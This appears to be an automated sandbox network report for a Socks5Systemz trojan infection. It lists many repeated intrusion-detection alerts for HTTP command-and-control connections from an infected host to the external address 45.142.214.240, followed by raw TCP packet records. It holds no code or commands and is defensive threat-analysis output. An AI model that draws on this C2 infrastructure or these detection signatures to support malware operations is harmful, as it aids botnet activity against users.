03/29/24-12:59:47.153192 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49800 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:31.562211 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49781 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:18.201077 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49764 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:58:57.434224 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49736 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:25.828412 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49774 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:44.826160 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49797 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:38.599677 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49791 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:28.169308 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49777 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:32.211512 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49782 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-13:00:01.144442 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49817 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:11.403065 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49756 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:14.168811 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49759 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:45.464018 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49798 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-13:00:00.317751 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49816 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:48.200098 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49801 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:52.843294 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49807 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:17.561359 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49763 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:09.075777 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49753 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:23.090769 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49771 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:55.404429 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49811 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:36.058657 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49788 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:02.340536 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49745 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:39.978368 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49792 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:31.562211 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49781 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:00.626740 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49743 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:13.121896 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49758 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:24.138039 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49772 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:26.471385 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49775 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:39.978368 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49792 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:18.201077 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49764 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:19.483683 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49766 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:22.033829 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49770 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:01.268339 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49744 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:34.777689 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49786 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:37.106191 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49789 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:07.153408 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49750 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:43.547929 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49795 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:21.394081 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49769 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:49.480506 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49803 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:46.108211 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49799 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:44.183959 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49796 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-13:00:01.144442 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49817 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:56.055877 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49812 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:58:58.279145 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49740 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:52.205310 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49806 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:16.918885 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49762 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:44.826160 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49797 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:58:59.965425 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49742 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:36.058657 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49788 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:02.340536 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49745 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:59.031292 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49814 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:42.903229 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49794 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:09.075777 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49753 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:07.805203 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49751 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:53.482569 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49808 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:25.184508 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49773 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:20.124059 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49767 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-13:00:03.080619 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49820 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:11.403065 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49756 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:32.856145 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49783 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:28.169308 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49777 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:54.762452 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49810 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:50.109189 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49804 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-13:00:02.442251 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49819 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:58:57.434224 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49736 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:08.435175 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49752 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-13:00:01.795965 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49818 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:56.055877 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49812 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:13.121896 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49758 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:33.499589 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49784 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:15.452590 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49761 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:54.123875 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49809 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:49.480506 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49803 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:00.626740 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49743 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:14.816268 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49760 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:50.109189 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49804 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:12.050126 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49757 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:22.033829 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49770 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:27.122910 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49776 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:41.029454 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49793 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:05.059289 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49748 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:20.124059 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49767 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:26.471385 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49775 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:06.106340 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49749 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:19.483683 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49766 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:51.153063 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49805 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:48.841670 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49802 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:18.842102 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49765 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:30.918916 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49780 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:58:59.965425 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49742 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-13:00:02.442251 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49819 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:12.050126 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49757 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:34.137988 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49785 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:16.918885 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49762 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:32.856145 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49783 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:58:58.916637 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49741 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:27.122910 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49776 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:56.945215 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49813 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:46.108211 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49799 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:34.777689 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49786 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:20.762171 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49768 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:07.805203 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49751 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:42.903229 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49794 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:33.499589 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49784 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:35.421196 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49787 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:03.387980 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49746 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-13:00:01.795965 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49818 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:08.435175 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49752 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:41.029454 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49793 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:28.814022 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49778 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:15.452590 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49761 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:47.153192 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49800 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:06.106340 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49749 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:10.764656 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49755 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:37.749118 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49790 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-13:00:03.080619 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49820 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:58:58.916637 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49741 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:54.123875 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49809 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:59.031292 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49814 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:53.482569 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49808 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:59.675457 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49815 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:45.464018 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49798 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:20.762171 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49768 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:48.841670 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49802 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:23.090769 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49771 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:05.059289 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49748 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:51.153063 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49805 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:38.599677 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49791 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:18.842102 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49765 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:55.404429 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49811 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:25.828412 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49774 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-13:00:00.317751 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49816 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:14.816268 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49760 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:43.547929 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49795 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:01.268339 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49744 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:56.945215 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49813 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:30.918916 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49780 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:10.122007 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49754 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:37.106191 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49789 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:07.153408 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49750 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:52.843294 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49807 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:34.137988 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49785 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:14.168811 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49759 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:29.458062 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49779 | 80 | 192.168.2.4 | 45.142.214.240
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                        Mar 29, 2024 12:59:11.705988884 CET804975645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:11.706095934 CET4975680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:11.825189114 CET4975680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:11.825474977 CET4975780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:12.042998075 CET804975645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:12.043083906 CET4975680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:12.044714928 CET804975745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:12.044796944 CET4975780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:12.050126076 CET4975780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:12.270544052 CET804975745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:12.361087084 CET804975745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:12.361222029 CET4975780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:12.485224009 CET4975780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:12.486033916 CET4975880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:12.704586029 CET804975745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:12.704684019 CET4975780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:12.708247900 CET804975845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:12.708326101 CET4975880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:12.708509922 CET4975880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:12.930782080 CET804975845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:13.009927988 CET804975845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:13.009989977 CET4975880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:13.121896029 CET4975880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:13.345434904 CET804975845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:13.428590059 CET804975845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:13.428703070 CET4975880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:13.543693066 CET4975880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:13.544008017 CET4975980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:13.760425091 CET804975945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:13.760554075 CET4975980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:13.760736942 CET4975980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:13.766047001 CET804975845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:13.766113043 CET4975880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:13.977118969 CET804975945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:14.055845976 CET804975945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:14.055942059 CET4975980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:14.168811083 CET4975980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:14.386018991 CET804975945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:14.470607996 CET804975945.142.214.240192.168.2.4
